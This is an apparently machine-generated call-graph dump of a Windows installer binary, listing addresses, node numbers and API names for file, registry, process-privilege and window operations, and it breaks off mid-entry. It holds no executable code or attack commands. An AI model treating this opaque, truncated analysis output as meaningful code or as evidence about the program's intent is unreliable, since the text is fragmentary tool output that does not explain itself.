405812 3 API calls 4374->4376 4375 401784 4378 40600b 5 API calls 4375->4378 4377 401797 lstrcatA 4376->4377 4377->4375 4403 4017a3 4378->4403 4379 4060a4 2 API calls 4379->4403 4380 4017e4 4381 4059ee 2 API calls 4380->4381 4381->4403 4383 4017ba CompareFileTime 4383->4403 4384 40187e 4386 404fb9 25 API calls 4384->4386 4385 401855 4387 404fb9 25 API calls 4385->4387 4404 40186a 4385->4404 4389 401888 4386->4389 4387->4404 4388 405da0 lstrcpynA 4388->4403 4390 402f33 32 API calls 4389->4390 4391 40189b 4390->4391 4392 4018af SetFileTime 4391->4392 4394 4018c1 CloseHandle 4391->4394 4392->4394 4393 405dc2 18 API calls 4393->4403 4395 4018d2 4394->4395 4394->4404 4396 4018d7 4395->4396 4397 4018ea 4395->4397 4398 405dc2 18 API calls 4396->4398 4399 405dc2 18 API calls 4397->4399 4400 4018df lstrcatA 4398->4400 4401 4018f2 4399->4401 4400->4401 4401->4404 4405 405596 MessageBoxIndirectA 4401->4405 4402 405596 MessageBoxIndirectA 4402->4403 4403->4379 4403->4380 4403->4383 4403->4384 4403->4385 4403->4388 4403->4393 4403->4402 4406 405a13 GetFileAttributesA CreateFileA 4403->4406 4405->4404 4406->4403 4407->4375 4408->4374 4877 401659 4878 402ace 18 API calls 4877->4878 4879 40165f 4878->4879 4880 4060a4 2 API calls 4879->4880 4881 401665 4880->4881 4882 401e59 4883 402ace 18 API calls 4882->4883 4884 401e5f 4883->4884 4885 402ace 18 API calls 4884->4885 4886 401e68 4885->4886 4887 402ace 18 API calls 4886->4887 4888 401e71 4887->4888 4889 402ace 18 API calls 4888->4889 4890 401e7a 4889->4890 4891 401423 25 API calls 4890->4891 4892 401e81 ShellExecuteA 4891->4892 4893 401eae 4892->4893 4894 401959 4895 402aac 18 API calls 4894->4895 4896 401960 4895->4896 4897 402aac 18 API calls 4896->4897 4898 40196d 4897->4898 4899 402ace 18 API calls 4898->4899 4900 401984 lstrlenA 4899->4900 4901 401994 4900->4901 4902 4019d4 4901->4902 4906 405da0 lstrcpynA 4901->4906 4904 4019c4 4904->4902 4905 4019c9 lstrlenA 4904->4905 4905->4902 4906->4904 4907 1000161a 4908 10001649 4907->4908 4909 10001a5d 18 API calls 4908->4909 4910 10001650 4909->4910 4911 10001663 4910->4911 4912 10001657 4910->4912 4913 1000168a 4911->4913 4914 1000166d 4911->4914 4915 10001266 2 API calls 4912->4915 4917 10001690 4913->4917 4918 100016b4 4913->4918 4916 100014e2 3 API calls 4914->4916 4919 10001661 4915->4919 4920 10001672 4916->4920 4921 10001559 3 API calls 4917->4921 4922 100014e2 3 API calls 4918->4922 4923 10001559 3 API calls 4920->4923 4924 10001695 4921->4924 4922->4919 4925 10001678 4923->4925 4926 10001266 2 API calls 4924->4926 4927 10001266 2 API calls 4925->4927 4928 1000169b GlobalFree 4926->4928 4929 1000167e GlobalFree 4927->4929 4928->4919 4930 100016af GlobalFree 4928->4930 4929->4919 4930->4919 4931 401f5d 4932 402ace 18 API calls 4931->4932 4933 401f64 4932->4933 4934 406139 5 API calls 4933->4934 4935 401f73 4934->4935 4936 401f8b GlobalAlloc 4935->4936 4937 401ff3 4935->4937 4936->4937 4938 401f9f 4936->4938 4939 406139 5 API calls 4938->4939 4940 401fa6 4939->4940 4941 406139 5 API calls 4940->4941 4942 401fb0 4941->4942 4942->4937 4946 405cfe wsprintfA 4942->4946 4944 401fe7 4947 405cfe wsprintfA 4944->4947 4946->4944 4947->4937 4948 401a5e 4949 402aac 18 API calls 4948->4949 4950 401a64 4949->4950 4951 402aac 18 API calls 4950->4951 4952 401a0e 4951->4952 4953 4036de 4954 4036e9 4953->4954 4955 4036f0 GlobalAlloc 4954->4955 4956 4036ed 4954->4956 4955->4956 4957 4026e1 4958 4026e7 4957->4958 4959 4026eb FindNextFileA 4958->4959 4961 4026fd 4958->4961 4960 40273c 4959->4960 4959->4961 4963 405da0 lstrcpynA 4960->4963 4963->4961 4964 40166a 4965 402ace 18 API calls 4964->4965 4966 401671 4965->4966 4967 402ace 18 API calls 4966->4967 4968 40167a 4967->4968 4969 402ace 18 API calls 4968->4969 4970 401683 MoveFileA 4969->4970 4971 401696 4970->4971 4972 40168f 4970->4972 4974 4060a4 2 API calls 4971->4974 4976 402238 4971->4976 4973 401423 25 API calls 4972->4973 4973->4976 4975 4016a5 4974->4975 4975->4976 4977 405c5b 38 API calls 4975->4977 4977->4972 4978 4019ed 4979 402ace 18 API calls 4978->4979 4980 4019f4 4979->4980 4981 402ace 18 API calls 4980->4981 4982 4019fd 4981->4982 4983 401a04 lstrcmpiA 4982->4983 4984 401a16 lstrcmpA 4982->4984 4985 401a0a 4983->4985 4984->4985 4986 40256e 4987 402ace 18 API calls 4986->4987 4988 402575 4987->4988 4991 405a13 GetFileAttributesA CreateFileA 4988->4991 4990 402581 4991->4990 4269 4022f2 4270 4022fa 4269->4270 4275 402300 4269->4275 4271 402ace 18 API calls 4270->4271 4271->4275 4272 402ace 18 API calls 4274 402310 4272->4274 4273 40231e 4277 402ace 18 API calls 4273->4277 4274->4273 4276 402ace 18 API calls 4274->4276 4275->4272 4275->4274 4276->4273 4278 402327 WritePrivateProfileStringA 4277->4278 4992 100015b3 4993 100014bb GlobalFree 4992->4993 4995 100015cb 4993->4995 4994 10001611 GlobalFree 4995->4994 4996 100015e6 4995->4996 4997 100015fd VirtualFree 4995->4997 4996->4994 4997->4994 4998 4014f4 SetForegroundWindow 4999 40295e 4998->4999 5000 401cf5 5001 402aac 18 API calls 5000->5001 5002 401cfc 5001->5002 5003 402aac 18 API calls 5002->5003 5004 401d08 GetDlgItem 5003->5004 5005 40258a 5004->5005 5006 4024f5 5007 402bd8 19 API calls 5006->5007 5008 4024ff 5007->5008 5009 402aac 18 API calls 5008->5009 5010 402508 5009->5010 5011 402523 RegEnumKeyA 5010->5011 5012 40252f RegEnumValueA 5010->5012 5013 402729 5010->5013 5014 402548 RegCloseKey 5011->5014 5012->5013 5012->5014 5014->5013 4344 402377 4345 4023a7 4344->4345 4346 40237c 4344->4346 4347 402ace 18 API calls 4345->4347 4348 402bd8 19 API calls 4346->4348 4351 4023ae 4347->4351 4349 402383 4348->4349 4350 40238d 4349->4350 4353 4023c4 4349->4353 4352 402ace 18 API calls 4350->4352 4356 402b0e RegOpenKeyExA 4351->4356 4354 402394 RegDeleteValueA RegCloseKey 4352->4354 4354->4353 4357 402ba2 4356->4357 4361 402b39 4356->4361 4357->4353 4358 402b5f RegEnumKeyA 4359 402b71 RegCloseKey 4358->4359 4358->4361 4362 406139 5 API calls 4359->4362 4360 402b96 RegCloseKey 4365 402b85 4360->4365 4361->4358 4361->4359 4361->4360 4363 402b0e 5 API calls 4361->4363 4364 402b81 4362->4364 4363->4361 4364->4365 4366 402bb1 RegDeleteKeyA 4364->4366 4365->4357 4366->4365 5016 4050f7 5017 4052a2 5016->5017 5018 405119 GetDlgItem GetDlgItem GetDlgItem 5016->5018 5019 4052d2 5017->5019 5020 4052aa GetDlgItem CreateThread CloseHandle 5017->5020 5061 403fba SendMessageA 5018->5061 5023 405300 5019->5023 5024 405321 5019->5024 5025 4052e8 ShowWindow ShowWindow 5019->5025 5020->5019 5022 405189 5026 405190 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5022->5026 5027 40535b 5023->5027 5029 405310 5023->5029 5030 405334 ShowWindow 5023->5030 5031 403fec 8 API calls 5024->5031 5063 403fba SendMessageA 5025->5063 5032 4051e2 SendMessageA SendMessageA 5026->5032 5033 4051fe 5026->5033 5027->5024 5034 405368 SendMessageA 5027->5034 5064 403f5e 5029->5064 5037 405354 5030->5037 5038 405346 5030->5038 5036 40532d 5031->5036 5032->5033 5040 405211 5033->5040 5041 405203 SendMessageA 5033->5041 5034->5036 5042 405381 CreatePopupMenu 5034->5042 5039 403f5e SendMessageA 5037->5039 5043 404fb9 25 API calls 5038->5043 5039->5027 5045 403f85 19 API calls 5040->5045 5041->5040 5044 405dc2 18 API calls 5042->5044 5043->5037 5046 405391 AppendMenuA 5044->5046 5047 405221 5045->5047 5048 4053c2 TrackPopupMenu 5046->5048 5049 4053af GetWindowRect 5046->5049 5050 40522a ShowWindow 5047->5050 5051 40525e GetDlgItem SendMessageA 5047->5051 5048->5036 5052 4053de 5048->5052 5049->5048 5053 405240 ShowWindow 5050->5053 5056 40524d 5050->5056 5051->5036 5054 405285 SendMessageA SendMessageA 5051->5054 5055 4053fd SendMessageA 5052->5055 5053->5056 5054->5036 5055->5055 5057 40541a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5055->5057 5062 403fba SendMessageA 5056->5062 5059 40543c SendMessageA 5057->5059 5059->5059 5060 40545e GlobalUnlock SetClipboardData CloseClipboard 5059->5060 5060->5036 5061->5022 5062->5051 5063->5023 5065 403f65 5064->5065 5066 403f6b SendMessageA 5064->5066 5065->5066 5066->5024 5067 40437c 5068 4043b2 5067->5068 5069 40438c 5067->5069 5071 403fec 8 API calls 5068->5071 5070 403f85 19 API calls 5069->5070 5072 404399 SetDlgItemTextA 5070->5072 5073 4043be 5071->5073 5072->5068 5074 1000103d 5075 1000101b 5 API calls 5074->5075 5076 10001056 5075->5076 5077 4018fd 5078 401934 5077->5078 5079 402ace 18 API calls 5078->5079 5080 401939 5079->5080 5081 405642 69 API calls 5080->5081 5082 401942 5081->5082 4442 401fff 4443 402011 4442->4443 4453 4020bf 4442->4453 4444 402ace 18 API calls 4443->4444 4446 402018 4444->4446 4445 401423 25 API calls 4451 402238 4445->4451 4447 402ace 18 API calls 4446->4447 4448 402021 4447->4448 4449 402036 LoadLibraryExA 4448->4449 4450 402029 GetModuleHandleA 4448->4450 4452 402046 GetProcAddress 4449->4452 4449->4453 4450->4449 4450->4452 4454 402092 4452->4454 4455 402055 4452->4455 4453->4445 4456 404fb9 25 API calls 4454->4456 4457 402074 4455->4457 4458 40205d 4455->4458 4459 402065 4456->4459 4463 100016bd 4457->4463 4460 401423 25 API calls 4458->4460 4459->4451 4461 4020b3 FreeLibrary 4459->4461 4460->4459 4461->4451 4464 100016ed 4463->4464 4505 10001a5d 4464->4505 4466 1000180a 4466->4459 4467 100016f4 4467->4466 4468 10001705 4467->4468 4469 1000170c 4467->4469 4554 100021b0 4468->4554 4537 100021fa 4469->4537 4474 10001770 4480 100017b2 4474->4480 4481 10001776 4474->4481 4475 10001752 4567 100023da 4475->4567 4476 10001722 4479 10001728 4476->4479 4483 10001733 4476->4483 4477 1000173b 4489 10001731 4477->4489 4564 10002aa3 4477->4564 4479->4489 4548 100027e8 4479->4548 4487 100023da 11 API calls 4480->4487 4485 10001559 3 API calls 4481->4485 4482 10001758 4578 10001559 4482->4578 4558 10002589 4483->4558 4491 1000178c 4485->4491 4492 100017a4 4487->4492 4489->4474 4489->4475 4495 100023da 11 API calls 4491->4495 4496 100017f9 4492->4496 4589 100023a0 4492->4589 4494 10001739 4494->4489 4495->4492 4496->4466 4500 10001803 GlobalFree 4496->4500 4500->4466 4502 100017e5 4502->4496 4593 100014e2 wsprintfA 4502->4593 4503 100017de FreeLibrary 4503->4502 4596 10001215 GlobalAlloc 4505->4596 4507 10001a81 4597 10001215 GlobalAlloc 4507->4597 4509 10001cbb GlobalFree GlobalFree GlobalFree 4510 10001cd8 4509->4510 4525 10001d22 4509->4525 4511 1000201a 4510->4511 4518 10001ced 4510->4518 4510->4525 4513 1000203c GetModuleHandleA 4511->4513 4511->4525 4512 10001b60 GlobalAlloc 4532 10001a8c 4512->4532 4516 10002062 4513->4516 4517 1000204d LoadLibraryA 4513->4517 4514 10001bab lstrcpyA 4519 10001bb5 lstrcpyA 4514->4519 4515 10001bc9 GlobalFree 4515->4532 4604 100015a4 GetProcAddress 4516->4604 4517->4516 4517->4525 4518->4525 4600 10001224 4518->4600 4519->4532 4521 100020b3 4522 100020c0 lstrlenA 4521->4522 4521->4525 4605 100015a4 GetProcAddress 4522->4605 4524 10001f7a 4524->4525 4529 10001fbe lstrcpyA 4524->4529 4525->4467 4526 10002074 4526->4521 4536 1000209d GetProcAddress 4526->4536 4529->4525 4530 10001e75 GlobalFree 4530->4532 4531 100020d9 4531->4525 4532->4509 4532->4512 4532->4514 4532->4515 4532->4519 4532->4524 4532->4525 4532->4530 4533 10001c07 4532->4533 4534 10001224 2 API calls 4532->4534 4603 10001215 GlobalAlloc 4532->4603 4533->4532 4598 10001534 GlobalSize GlobalAlloc 4533->4598 4534->4532 4536->4521 4543 10002212 4537->4543 4539 10002349 GlobalFree 4540 10001712 4539->4540 4539->4543 4540->4476 4540->4477 4540->4489 4541 100022b9 GlobalAlloc MultiByteToWideChar 4545 10002303 4541->4545 4546 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4541->4546 4542 1000230a lstrlenA 4542->4539 4542->4545 4543->4539 4543->4541 4543->4542 4544 10001224 GlobalAlloc lstrcpynA 4543->4544 4607 100012ad 4543->4607 4544->4543 4545->4539 4611 1000251d 4545->4611 4546->4539 4550 100027fa 4548->4550 4549 1000289f VirtualAllocEx 4551 100028bd 4549->4551 4550->4549 4552 100029b9 4551->4552 4553 100029ae GetLastError 4551->4553 4552->4489 4553->4552 4555 100021c0 4554->4555 4556 1000170b 4554->4556 4555->4556 4557 100021d2 GlobalAlloc 4555->4557 4556->4469 4557->4555 4562 100025a5 4558->4562 4559 100025f6 GlobalAlloc 4563 10002618 4559->4563 4560 10002609 4561 1000260e GlobalSize 4560->4561 4560->4563 4561->4563 4562->4559 4562->4560 4563->4494 4565 10002aae 4564->4565 4566 10002aee GlobalFree 4565->4566 4614 10001215 GlobalAlloc 4567->4614 4569 1000243a lstrcpynA 4575 100023e6 4569->4575 4570 1000244b StringFromGUID2 WideCharToMultiByte 4570->4575 4571 1000246f WideCharToMultiByte 4571->4575 4572 10002490 wsprintfA 4572->4575 4573 100024b4 GlobalFree 4573->4575 4574 100024ee GlobalFree 4574->4482 4575->4569 4575->4570 4575->4571 4575->4572 4575->4573 4575->4574 4576 10001266 2 API calls 4575->4576 4615 100012d1 4575->4615 4576->4575 4619 10001215 GlobalAlloc 4578->4619 4580 1000155f 4582 10001586 4580->4582 4583 1000156c lstrcpyA 4580->4583 4584 100015a0 4582->4584 4585 1000158b wsprintfA 4582->4585 4583->4584 4586 10001266 4584->4586 4585->4584 4587 100012a8 GlobalFree 4586->4587 4588 1000126f GlobalAlloc lstrcpynA 4586->4588 4587->4492 4588->4587 4590 100017c5 4589->4590 4591 100023ae 4589->4591 4590->4502 4590->4503 4591->4590 4592 100023c7 GlobalFree 4591->4592 4592->4591 4594 10001266 2 API calls 4593->4594 4595 10001503 4594->4595 4595->4496 4596->4507 4597->4532 4599 10001552 4598->4599 4599->4533 4606 10001215 GlobalAlloc 4600->4606 4602 10001233 lstrcpynA 4602->4525 4603->4532 4604->4526 4605->4531 4606->4602 4608 100012b4 4607->4608 4609 10001224 2 API calls 4608->4609 4610 100012cf 4609->4610 4610->4543 4612 10002581 4611->4612 4613 1000252b VirtualAlloc 4611->4613 4612->4545 4613->4612 4614->4575 4616 100012f9 4615->4616 4617 100012da 4615->4617 4616->4575 4617->4616 4618 100012e0 lstrcpyA 4617->4618 4618->4616 4619->4580 3753 403180 SetErrorMode GetVersion 3754 4031b7 3753->3754 3755 4031bd 3753->3755 3756 406139 5 API calls 3754->3756 3841 4060cb GetSystemDirectoryA 3755->3841 3756->3755 3758 4031d3 lstrlenA 3758->3755 3759 4031e2 3758->3759 3844 406139 GetModuleHandleA 3759->3844 3762 406139 5 API calls 3763 4031f1 #17 OleInitialize SHGetFileInfoA 3762->3763 3850 405da0 lstrcpynA 3763->3850 3765 40322e GetCommandLineA 3851 405da0 lstrcpynA 3765->3851 3767 403240 GetModuleHandleA 3768 403257 3767->3768 3852 40583d 3768->3852 3771 403345 3772 403358 GetTempPathA 3771->3772 3856 40314f 3772->3856 3774 403370 3775 403374 GetWindowsDirectoryA lstrcatA 3774->3775 3776 4033ca DeleteFileA 3774->3776 3778 40314f 12 API calls 3775->3778 3866 402cfa GetTickCount GetModuleFileNameA 3776->3866 3777 40583d CharNextA 3779 40327b 3777->3779 3781 403390 3778->3781 3779->3771 3779->3777 3782 403347 3779->3782 3781->3776 3784 403394 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3781->3784 3951 405da0 lstrcpynA 3782->3951 3783 4033de 3790 40583d CharNextA 3783->3790 3823 403464 3783->3823 3836 403474 3783->3836 3786 40314f 12 API calls 3784->3786 3788 4033c2 3786->3788 3788->3776 3788->3836 3792 4033f9 3790->3792 3800 4034a4 3792->3800 3801 40343f 3792->3801 3793 4035ac 3796 4035b4 GetCurrentProcess OpenProcessToken 3793->3796 3797 40362e ExitProcess 3793->3797 3794 40348e 3975 405596 3794->3975 3802 4035ff 3796->3802 3803 4035cf LookupPrivilegeValueA AdjustTokenPrivileges 3796->3803 3979 405519 3800->3979 3952 405900 3801->3952 3806 406139 5 API calls 3802->3806 3803->3802 3809 403606 3806->3809 3812 40361b ExitWindowsEx 3809->3812 3815 403627 3809->3815 3810 4034c5 lstrcatA lstrcmpiA 3814 4034e1 3810->3814 3810->3836 3811 4034ba lstrcatA 3811->3810 3812->3797 3812->3815 3817 4034e6 3814->3817 3818 4034ed 3814->3818 4017 40140b 3815->4017 3816 403459 3967 405da0 lstrcpynA 3816->3967 3982 40547f CreateDirectoryA 3817->3982 3987 4054fc CreateDirectoryA 3818->3987 3894 403720 3823->3894 3825 4034f2 SetCurrentDirectoryA 3826 403501 3825->3826 3827 40350c 3825->3827 3990 405da0 lstrcpynA 3826->3990 3991 405da0 lstrcpynA 3827->3991 3832 403558 CopyFileA 3838 40351a 3832->3838 3833 4035a0 3834 405c5b 38 API calls 3833->3834 3834->3836 3968 403646 3836->3968 3837 405dc2 18 API calls 3837->3838 3838->3833 3838->3837 3840 40358c CloseHandle 3838->3840 3992 405dc2 3838->3992 4010 405c5b MoveFileExA 3838->4010 4014 405531 CreateProcessA 3838->4014 3840->3838 3843 4060ed wsprintfA LoadLibraryExA 3841->3843 3843->3758 3845 406155 3844->3845 3846 40615f GetProcAddress 3844->3846 3847 4060cb 3 API calls 3845->3847 3848 4031ea 3846->3848 3849 40615b 3847->3849 3848->3762 3849->3846 3849->3848 3850->3765 3851->3767 3853 405843 3852->3853 3854 40326b CharNextA 3853->3854 3855 405849 CharNextA 3853->3855 3854->3779 3855->3853 4020 40600b 3856->4020 3858 403165 3858->3774 3859 40315b 3859->3858 4029 405812 lstrlenA CharPrevA 3859->4029 3862 4054fc 2 API calls 3863 403173 3862->3863 4032 405a42 3863->4032 4036 405a13 GetFileAttributesA CreateFileA 3866->4036 3868 402d3a 3869 402d4a 3868->3869 4037 405da0 lstrcpynA 3868->4037 3869->3783 3871 402d60 4038 405859 lstrlenA 3871->4038 3875 402d71 GetFileSize 3876 402d88 3875->3876 3891 402e6d 3875->3891 3876->3869 3881 402ed9 3876->3881 3889 402c96 6 API calls 3876->3889 3876->3891 4075 403122 3876->4075 3878 402e76 3878->3869 3880 402ea6 GlobalAlloc 3878->3880 4078 403138 SetFilePointer 3878->4078 4054 403138 SetFilePointer 3880->4054 3885 402c96 6 API calls 3881->3885 3884 402ec1 4055 402f33 3884->4055 3885->3869 3886 402e8f 3888 403122 ReadFile 3886->3888 3890 402e9a 3888->3890 3889->3876 3890->3869 3890->3880 4043 402c96 3891->4043 3892 402ecd 3892->3869 3892->3892 3893 402f0a SetFilePointer 3892->3893 3893->3869 3895 406139 5 API calls 3894->3895 3896 403734 3895->3896 3897 40373a 3896->3897 3898 40374c 3896->3898 4108 405cfe wsprintfA 3897->4108 4109 405c87 RegOpenKeyExA 3898->4109 3901 403795 lstrcatA 3904 40374a 3901->3904 3903 405c87 3 API calls 3903->3901 4099 4039e5 3904->4099 3907 405900 18 API calls 3908 4037c7 3907->3908 3909 403850 3908->3909 3911 405c87 3 API calls 3908->3911 3910 405900 18 API calls 3909->3910 3912 403856 3910->3912 3913 4037f3 3911->3913 3914 403866 LoadImageA 3912->3914 3915 405dc2 18 API calls 3912->3915 3913->3909 3920 40380f lstrlenA 3913->3920 3921 40583d CharNextA 3913->3921 3916 40390c 3914->3916 3917 40388d RegisterClassA 3914->3917 3915->3914 3919 40140b 2 API calls 3916->3919 3918 4038c3 SystemParametersInfoA CreateWindowExA 3917->3918 3950 403916 3917->3950 3918->3916 3924 403912 3919->3924 3922 403843 3920->3922 3923 40381d lstrcmpiA 3920->3923 3925 40380d 3921->3925 3927 405812 3 API calls 3922->3927 3923->3922 3926 40382d GetFileAttributesA 3923->3926 3929 4039e5 19 API calls 3924->3929 3924->3950 3925->3920 3928 403839 3926->3928 3930 403849 3927->3930 3928->3922 3931 405859 2 API calls 3928->3931 3932 403923 3929->3932 4114 405da0 lstrcpynA 3930->4114 3931->3922 3934 4039b2 3932->3934 3935 40392f ShowWindow 3932->3935 4115 40508b OleInitialize 3934->4115 3937 4060cb 3 API calls 3935->3937 3939 403947 3937->3939 3938 4039b8 3940 4039d4 3938->3940 3941 4039bc 3938->3941 3942 403955 GetClassInfoA 3939->3942 3946 4060cb 3 API calls 3939->3946 3945 40140b 2 API calls 3940->3945 3948 40140b 2 API calls 3941->3948 3941->3950 3943 403969 GetClassInfoA RegisterClassA 3942->3943 3944 40397f DialogBoxParamA 3942->3944 3943->3944 3947 40140b 2 API calls 3944->3947 3945->3950 3946->3942 3949 4039a7 3947->3949 3948->3950 3949->3950 3950->3836 3951->3772 4130 405da0 lstrcpynA 3952->4130 3954 405911 4131 4058ab CharNextA CharNextA 3954->4131 3957 40344a 3957->3836 3966 405da0 lstrcpynA 3957->3966 3958 40600b 5 API calls 3964 405927 3958->3964 3959 405952 lstrlenA 3960 40595d 3959->3960 3959->3964 3961 405812 3 API calls 3960->3961 3963 405962 GetFileAttributesA 3961->3963 3963->3957 3964->3957 3964->3959 3965 405859 2 API calls 3964->3965 4137 4060a4 FindFirstFileA 3964->4137 3965->3959 3966->3816 3967->3823 3969 403650 CloseHandle 3968->3969 3970 40365e 3968->3970 3969->3970 4140 40368b 3970->4140 3976 4055ab 3975->3976 3977 40349c ExitProcess 3976->3977 3978 4055bf MessageBoxIndirectA 3976->3978 3978->3977 3980 406139 5 API calls 3979->3980 3981 4034a9 lstrcatA 3980->3981 3981->3810 3981->3811 3983 4054d0 GetLastError 3982->3983 3984 4034eb 3982->3984 3983->3984 3985 4054df SetFileSecurityA 3983->3985 3984->3825 3985->3984 3986 4054f5 GetLastError 3985->3986 3986->3984 3988 405510 GetLastError 3987->3988 3989 40550c 3987->3989 3988->3989 3989->3825 3990->3827 3991->3838 3993 405dcf 3992->3993 3994 405ff2 3993->3994 3997 405e70 GetVersion 3993->3997 3998 405fc9 lstrlenA 3993->3998 4001 405dc2 10 API calls 3993->4001 4002 405ee8 GetSystemDirectoryA 3993->4002 4003 405c87 3 API calls 3993->4003 4004 405efb GetWindowsDirectoryA 3993->4004 4005 40600b 5 API calls 3993->4005 4006 405f2f SHGetSpecialFolderLocation 3993->4006 4007 405dc2 10 API calls 3993->4007 4008 405f72 lstrcatA 3993->4008 4197 405cfe wsprintfA 3993->4197 4198 405da0 lstrcpynA 3993->4198 3995 40354b DeleteFileA 3994->3995 4199 405da0 lstrcpynA 3994->4199 3995->3832 3995->3838 3997->3993 3998->3993 4001->3998 4002->3993 4003->3993 4004->3993 4005->3993 4006->3993 4009 405f47 SHGetPathFromIDListA CoTaskMemFree 4006->4009 4007->3993 4008->3993 4009->3993 4011 405c7c 4010->4011 4012 405c6f 4010->4012 4011->3838 4200 405ae9 lstrcpyA 4012->4200 4015 405570 4014->4015 4016 405564 CloseHandle 4014->4016 4015->3838 4016->4015 4018 401389 2 API calls 4017->4018 4019 401420 4018->4019 4019->3797 4026 406017 4020->4026 4021 406083 CharPrevA 4022 40607f 4021->4022 4022->4021 4025 40609e 4022->4025 4023 406074 CharNextA 4023->4022 4023->4026 4024 40583d CharNextA 4024->4026 4025->3859 4026->4022 4026->4023 4026->4024 4027 406062 CharNextA 4026->4027 4028 40606f CharNextA 4026->4028 4027->4026 4028->4023 4030 40316d 4029->4030 4031 40582c lstrcatA 4029->4031 4030->3862 4031->4030 4033 405a4d GetTickCount GetTempFileNameA 4032->4033 4034 40317e 4033->4034 4035 405a7a 4033->4035 4034->3774 4035->4033 4035->4034 4036->3868 4037->3871 4039 405866 4038->4039 4040 402d66 4039->4040 4041 40586b CharPrevA 4039->4041 4042 405da0 lstrcpynA 4040->4042 4041->4039 4041->4040 4042->3875 4044 402cb7 4043->4044 4045 402c9f 4043->4045 4048 402cc7 GetTickCount 4044->4048 4049 402cbf 4044->4049 4046 402ca8 DestroyWindow 4045->4046 4047 402caf 4045->4047 4046->4047 4047->3878 4051 402cd5 CreateDialogParamA ShowWindow 4048->4051 4052 402cf8 4048->4052 4079 406175 4049->4079 4051->4052 4052->3878 4054->3884 4056 402f49 4055->4056 4057 402f77 4056->4057 4085 403138 SetFilePointer 4056->4085 4059 403122 ReadFile 4057->4059 4060 402f82 4059->4060 4061 402f94 GetTickCount 4060->4061 4062 4030bb 4060->4062 4064 4030a5 4060->4064 4061->4064 4071 402fc0 4061->4071 4063 4030fd 4062->4063 4068 4030bf 4062->4068 4066 403122 ReadFile 4063->4066 4064->3892 4065 403122 ReadFile 4065->4071 4066->4064 4067 403122 ReadFile 4067->4068 4068->4064 4068->4067 4069 405aba WriteFile 4068->4069 4069->4068 4070 403016 GetTickCount 4070->4071 4071->4064 4071->4065 4071->4070 4072 40303b MulDiv wsprintfA 4071->4072 4083 405aba WriteFile 4071->4083 4086 404fb9 4072->4086 4097 405a8b ReadFile 4075->4097 4078->3886 4080 406192 PeekMessageA 4079->4080 4081 402cc5 4080->4081 4082 406188 DispatchMessageA 4080->4082 4081->3878 4082->4080 4084 405ad8 4083->4084 4084->4071 4085->4057 4087 404fd4 4086->4087 4096 405077 4086->4096 4088 404ff1 lstrlenA 4087->4088 4089 405dc2 18 API calls 4087->4089 4090 40501a 4088->4090 4091 404fff lstrlenA 4088->4091 4089->4088 4093 405020 SetWindowTextA 4090->4093 4094 40502d 4090->4094 4092 405011 lstrcatA 4091->4092 4091->4096 4092->4090 4093->4094 4095 405033 SendMessageA SendMessageA SendMessageA 4094->4095 4094->4096 4095->4096 4096->4071 4098 403135 4097->4098 4098->3876 4100 4039f9 4099->4100 4122 405cfe wsprintfA 4100->4122 4102 403a6a 4103 405dc2 18 API calls 4102->4103 4104 403a76 SetWindowTextA 4103->4104 4105 403a92 4104->4105 4106 4037a5 4104->4106 4105->4106 4107 405dc2 18 API calls 4105->4107 4106->3907 4107->4105 4108->3904 4110 403777 4109->4110 4111 405cba RegQueryValueExA 4109->4111 4110->3901 4110->3903 4112 405cdb RegCloseKey 4111->4112 4112->4110 4114->3909 4123 403fd1 4115->4123 4117 4050ae 4121 4050d5 4117->4121 4126 401389 4117->4126 4118 403fd1 SendMessageA 4119 4050e7 OleUninitialize 4118->4119 4119->3938 4121->4118 4122->4102 4124 403fe9 4123->4124 4125 403fda SendMessageA 4123->4125 4124->4117 4125->4124 4128 401390 4126->4128 4127 4013fe 4127->4117 4128->4127 4129 4013cb MulDiv SendMessageA 4128->4129 4129->4128 4130->3954 4132 4058d6 4131->4132 4133 4058c6 4131->4133 4135 40583d CharNextA 4132->4135 4136 4058f6 4132->4136 4133->4132 4134 4058d1 CharNextA 4133->4134 4134->4136 4135->4132 4136->3957 4136->3958 4138 4060c5 4137->4138 4139 4060ba FindClose 4137->4139 4138->3964 4139->4138 4142 403699 4140->4142 4141 403663 4144 405642 4141->4144 4142->4141 4143 40369e FreeLibrary GlobalFree 4142->4143 4143->4141 4143->4143 4145 405900 18 API calls 4144->4145 4146 405662 4145->4146 4147 405681 4146->4147 4148 40566a DeleteFileA 4146->4148 4150 4057b9 4147->4150 4184 405da0 lstrcpynA 4147->4184 4149 40347d OleUninitialize 4148->4149 4149->3793 4149->3794 4150->4149 4155 4060a4 2 API calls 4150->4155 4152 4056a7 4153 4056ba 4152->4153 4154 4056ad lstrcatA 4152->4154 4157 405859 2 API calls 4153->4157 4156 4056c0 4154->4156 4158 4057d3 4155->4158 4159 4056ce lstrcatA 4156->4159 4161 4056d9 lstrlenA FindFirstFileA 4156->4161 4157->4156 4158->4149 4160 4057d7 4158->4160 4159->4161 4162 405812 3 API calls 4160->4162 4163 4057af 4161->4163 4182 4056fd 4161->4182 4164 4057dd 4162->4164 4163->4150 4166 4055fa 5 API calls 4164->4166 4165 40583d CharNextA 4165->4182 4167 4057e9 4166->4167 4168 405803 4167->4168 4169 4057ed 4167->4169 4172 404fb9 25 API calls 4168->4172 4169->4149 4174 404fb9 25 API calls 4169->4174 4170 40578e FindNextFileA 4173 4057a6 FindClose 4170->4173 4170->4182 4172->4149 4173->4163 4175 4057fa 4174->4175 4176 405c5b 38 API calls 4175->4176 4179 405801 4176->4179 4178 405642 62 API calls 4178->4182 4179->4149 4180 404fb9 25 API calls 4180->4170 4181 404fb9 25 API calls 4181->4182 4182->4165 4182->4170 4182->4178 4182->4180 4182->4181 4183 405c5b 38 API calls 4182->4183 4185 405da0 lstrcpynA 4182->4185 4186 4055fa 4182->4186 4183->4182 4184->4152 4185->4182 4194 4059ee GetFileAttributesA 4186->4194 4189 405615 RemoveDirectoryA 4191 405623 4189->4191 4190 40561d DeleteFileA 4190->4191 4192 405627 4191->4192 4193 405633 SetFileAttributesA 4191->4193 4192->4182 4193->4192 4195 405a00 SetFileAttributesA 4194->4195 4196 405606 4194->4196 4195->4196 4196->4189 4196->4190 4196->4192 4197->3993 4198->3993 4199->3995 4201 405b11 4200->4201 4202 405b37 GetShortPathNameA 4200->4202 4227 405a13 GetFileAttributesA CreateFileA 4201->4227 4203 405c56 4202->4203 4204 